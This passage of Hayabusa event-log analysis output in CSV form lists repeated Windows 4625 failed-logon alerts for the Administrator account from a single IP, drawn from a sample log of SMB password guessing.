Wrong Password,User: Administrator | Type: 3 | Computer: SMMgPu1VJIjAWPDW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1JjIa4nOKDTLuAD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.377 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0J0GJIm1UUXHH9QJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.419 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVX3xIz0hrQFvPr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.470 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nv4tKFEmHjiXkVDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.500 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdHHJl9LBek9pIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.545 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MWofwwLjwiyBk39P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.589 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dvsHFZe7Z1uJ9Dkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aDdgwvb1zsZF79k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQUb6CnMUtyrMNhF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP5OxHPsbLHnIUBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.744 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ysg903vYFhQHYvFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IySarHtsTvwSP56H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.828 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnUy8tbCIAVnmhDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.863 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bfBtc4MnMtPG6MpC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37b8MGIHY8QwXf9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDuaWikplDmJNmIE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.989 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kSSoAYJILHCPI7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.023 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9ikrtTGcZYU1556 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.064 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ypyd6SagvUXQHhtZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.100 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWS37lIJ3Q6ghgMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H211KmFImpBRwTGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64tO5iBehXQcNc49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xvxDngRj3j5TAwST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.281 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8VYRjMnxDgUTWYf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.331 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhWphTesbUf0hwi1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MO8VRRVANxIkDzEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.429 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ziSXANiDAf7LRFz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.527 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g0CvYYtyEcU2riBX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPg2LKgWMeM0Oqo0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbzL9T2d4RdeCz4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.653 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PeEfbWpoipfYtOKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.685 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RKJW1vSrIAbRTzyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.730 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aU4G8NBru22Vc4Cl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sacBcqxV97FUihrd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.821 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 41Ms0lEMeT0jYxYj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.859 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkQWVEHGM1NxowR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qKqRY7L2IQRoU57 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.954 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMIkvwbvqc9V6CFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.001 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PehzjCnK42ZPUE7e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.049 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fqw2GWiYfO0kU83 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.094 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFPJJNCFdPJl4igl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zc6CrAr7YoozKB6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHXminAIeV4ZJIK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06YmUCHNZqbaZMdZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.282 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fYoENCtP2uPy9xNh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TRJRuXJTTH1afAfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.381 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpnkzTlc3Uvj3hpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.425 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIuD8haFzR8P87rL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.475 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL1IreMAiE564NXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMUiCaMGBC46MnPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MOSWbwooyb60LExG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSDNF7s3vbtkZIOz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.641 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JBMk0qOV6237XtK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.694 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j41R1U1tYPvApCkZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.737 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcPkVZSeg5VwChW8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.778 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDLxt5gaFDTKsiVl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94JvBKdxJkawQQMT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KgBMk00K3iC1GQem | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XdGOj9Ybm6bcCo3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.950 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: by6F4YKorxhp5ahn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1G6ZOgOaV6luDQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.046 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qqSwNfvpPLQd6ZH1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.087 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mxtJJj54xSzHibHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.129 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Y3yznfdaZ7dtwDO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esllFn4asbLxwkBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.202 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Pr0cgd6cF5ukhZ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.249 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pS2fabTrbl6rZ1NB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.305 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkylDDmUyuT57HdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Aqs8rSvuLAQuhfDp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KI07KTgBJc4kBSKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.421 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Re3n3nJ8EEhRRT3G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BzspAC3z1csEn0Ve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.505 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tpkb6bf42SLUst3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.546 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1F5d2wn60OgAExW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bhPNRHWhTyonDPuA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.642 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zEsnyWpUuHVBo6et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.685 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I2FwaWy9TALkk9eU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.778 